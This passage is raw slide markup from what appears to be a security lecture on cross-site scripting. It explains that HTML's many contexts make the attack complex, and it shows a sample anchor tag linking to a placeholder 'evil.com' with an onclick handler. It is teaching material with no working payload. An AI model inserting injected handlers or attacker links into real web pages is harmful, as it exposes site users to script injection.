              <a:t>Cross</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" spc="-27" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>site</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" spc="20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>scripting</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" spc="13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>is</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>significantly</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" spc="40" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>more </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>complex</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>than</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" spc="13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>the </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>command</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" spc="13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>or</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>SQL injection.</a:t>
            </a:r>
            <a:endParaRPr sz="4267">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="474121" marR="179489" indent="-458035">
              <a:spcBef>
                <a:spcPts val="1020"/>
              </a:spcBef>
              <a:buFont typeface="Arial MT"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="474121" algn="l"/>
                <a:tab pos="474968" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="4267" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>The</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>main</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" spc="13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>reason</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" spc="-33" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" spc="-40" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>for</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>this</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" spc="7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>is</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>large</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>number </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" spc="-947" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>of</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" i="1" spc="-27" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>contexts</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" i="1" spc="13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>present</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>in</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> HTML.</a:t>
            </a:r>
            <a:endParaRPr sz="4267">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="917787" y="4921232"/>
            <a:ext cx="9318412" cy="1125094"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="16933" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="16933">
              <a:spcBef>
                <a:spcPts val="133"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;a</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-33" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-13" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-13" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1" spc="-13" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="8000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>"h</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1" spc="-13" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="8000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>t</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1" spc="-13" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="8000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>tp://evil.com"</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1" spc="-33" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="8000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-13" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>onclick</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-13" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1" spc="-13" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="8000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>"functionCall()"</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-13" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="16933"/>
            <a:r>
              <a:rPr sz="2400" b="1" spc="-13" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>Possibly</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1" spc="-40" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-13" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;b&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1" spc="-13" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-13" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;/b&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-47" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1" spc="-13" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>Text</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="16933">
              <a:spcBef>
                <a:spcPts val="33"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" spc="-13" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;/a&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Courier New"/>
              <a:cs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807" y="450638"/>
            <a:ext cx="5362787" cy="695062"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="17780" rIns="0" bIns="0" rtlCol="0" anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="16933">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="140"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr spc="-20" dirty="0"/>
              <a:t>Contexts</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-73" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>in</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-40" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-7" dirty="0"/>
              <a:t>HTML</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="object 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="714587" y="1610360"/>
            <a:ext cx="10404687" cy="2772810"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="17780" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="474121" marR="6773" indent="-458035">
              <a:spcBef>
                <a:spcPts val="140"/>
              </a:spcBef>
              <a:buFont typeface="Arial MT"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="474121" algn="l"/>
                <a:tab pos="474968" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="4267" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Cross</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" spc="-27" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>site</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" spc="20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>scripting</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" spc="13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>is</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>significantly</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" spc="40" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>more </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>complex</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>than</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" spc="13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>the </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>command</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" spc="13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>or</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>SQL injection.</a:t>
            </a:r>
            <a:endParaRPr sz="4267">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="474121" marR="179489" indent="-458035">
              <a:spcBef>
                <a:spcPts val="1020"/>
              </a:spcBef>
              <a:buFont typeface="Arial MT"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="474121" algn="l"/>
                <a:tab pos="474968" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="4267" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>The</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>main</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" spc="13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>reason</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" spc="-33" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" spc="-40" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>for</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>this</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" spc="7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>is</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>large</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>number </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" spc="-947" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>of</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" i="1" spc="-27" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>contexts</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" i="1" spc="13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>present</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>in</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> HTML.</a:t>
            </a:r>
            <a:endParaRPr sz="4267">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="917787" y="5656816"/>
            <a:ext cx="763693" cy="386430"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="16933" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="16933">
              <a:spcBef>
                <a:spcPts val="133"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-27" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
